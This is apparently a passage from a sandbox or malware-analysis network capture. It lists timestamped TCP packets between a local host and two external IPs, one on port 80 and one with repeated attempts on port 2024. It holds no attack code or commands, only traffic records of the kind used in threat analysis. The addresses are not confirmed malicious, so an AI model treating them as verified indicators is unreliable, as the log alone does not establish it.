Jun 7, 2021 20:45:08.389750004 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.389770985 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.389777899 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.389791012 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.389810085 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.389811993 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.389836073 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.389873028 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.458558083 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.458599091 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.458621025 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.458633900 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.458642006 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.458663940 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.458681107 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.458686113 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.458707094 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.458714962 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.458729029 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.458750010 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.458753109 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.458775043 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.458796978 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.458805084 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.458817959 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.458832026 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.458842039 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.458859921 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.458864927 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.458885908 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.458895922 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.458908081 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.458920956 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.458930016 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.458954096 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.458956957 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.458978891 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.458998919 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.459001064 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.459021091 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.459043026 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.459043026 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.459064007 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.459067106 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.459085941 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.459103107 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.459106922 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.459142923 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.459151983 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.459178925 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.459192991 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.459203959 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.459227085 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.459228992 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.459249973 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.459256887 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.459274054 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.459285975 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.459295034 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.459317923 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.459326029 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.459342957 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.459369898 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.459383011 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.459398031 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.459420919 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.459439039 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.459441900 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.459465027 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.459486008 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.459518909 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.459549904 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.551271915 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551312923 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551326990 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551341057 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551361084 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551374912 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551392078 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551404953 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551429987 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551426888 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.551446915 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551460028 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551477909 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551485062 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.551495075 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551503897 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.551512957 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551525116 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.551529884 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551547050 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551568031 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.551578045 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551592112 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.551595926 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551626921 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.551656008 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551666975 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.551676035 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551714897 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551723003 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.551732063 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551739931 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.551750898 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551759005 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.551799059 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551806927 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.551817894 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551821947 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.551836014 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551843882 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.551852942 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551870108 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.551877975 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.551894903 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.551906109 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.552028894 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.552047014 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.552058935 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.552078962 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.552093029 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.552104950 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.552108049 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.552109957 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.552128077 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.552136898 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.552186012 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.552187920 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.552191019 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.552210093 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.552226067 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.552244902 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.552248001 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.552263021 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.552287102 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.552301884 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.623545885 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.623593092 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.623615026 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.623636961 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.623656034 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.623680115 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.623702049 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.623698950 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.623727083 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.623745918 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.623754978 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.623769045 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.623792887 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.623800993 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.623805046 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.623815060 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.623832941 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.623836040 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.623856068 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.623866081 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.623879910 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.623903036 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.623904943 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.623923063 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.623925924 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.623949051 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.623953104 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.623970985 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.623989105 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.623996019 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.624017000 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.624017954 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.624038935 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.624047041 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.624062061 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.624068022 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.624083996 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.624084949 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.624106884 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.624119043 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.624129057 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.624146938 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.624150991 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.624172926 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.624176025 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.624196053 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.624202967 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.624223948 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.624244928 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.713479996 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.713516951 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.713541985 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.713565111 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.713584900 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.713587999 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.713603973 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.713622093 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.713644981 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.713654995 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.713670015 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.713679075 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.713691950 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.713701010 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.713715076 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.713735104 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.713742018 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.713757992 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.713778973 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.713778973 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.713800907 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.713809013 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.713826895 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.713848114 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.713849068 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.713871002 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.713891029 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.713891983 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.713912964 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.713913918 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.713937044 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.713957071 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.713958979 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.713979959 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.713984966 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.714004993 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.714025974 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.714026928 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.714047909 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.714051008 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.714067936 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.714077950 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.714088917 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.714104891 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.714112997 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.714145899 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:09.426626921 CEST	49755	2024	192.168.2.6	172.94.125.152
Jun 7, 2021 20:45:12.538937092 CEST	49755	2024	192.168.2.6	172.94.125.152
Jun 7, 2021 20:45:13.459501028 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:13.459656000 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:13.552512884 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:13.552629948 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:18.084475994 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:18.539402962 CEST	49755	2024	192.168.2.6	172.94.125.152
Jun 7, 2021 20:45:19.405988932 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.586272001 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.586503983 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.587258101 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.751980066 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.764909983 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.764949083 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.764975071 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.765001059 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.765022993 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.765028954 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.765063047 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.765064001 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.765083075 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.765095949 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.765105963 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.765122890 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.765151024 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.765177011 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.765178919 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.765207052 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.765228987 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.925116062 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.925281048 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.925311089 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.925354958 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.925358057 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.925379992 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.925401926 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.925421953 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.925430059 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.925456047 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.925479889 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.925503016 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.925533056 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.925626993 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.925771952 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.925838947 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.925867081 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.925915956 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.925952911 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.926002026 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.926038027 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.926089048 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.926143885 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.926187038 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.926204920 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.926244020 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.926263094 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.926301956 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.926330090 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.926373005 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.926393032 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.926433086 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.926450014 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.926486969 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:19.926510096 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:19.926553965 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.086272001 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086304903 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086328983 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086340904 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.086360931 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086389065 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086407900 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.086412907 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086441994 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.086457968 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086483002 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086504936 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086508036 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.086524010 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.086529970 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086549997 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.086555004 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086571932 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.086584091 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086592913 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.086612940 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086616993 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.086638927 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086647987 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.086664915 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086669922 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.086690903 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086700916 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.086715937 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086723089 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.086743116 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086750984 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.086766958 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086775064 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.086795092 CEST	80	49756	192.185.113.219	192.168.2.6
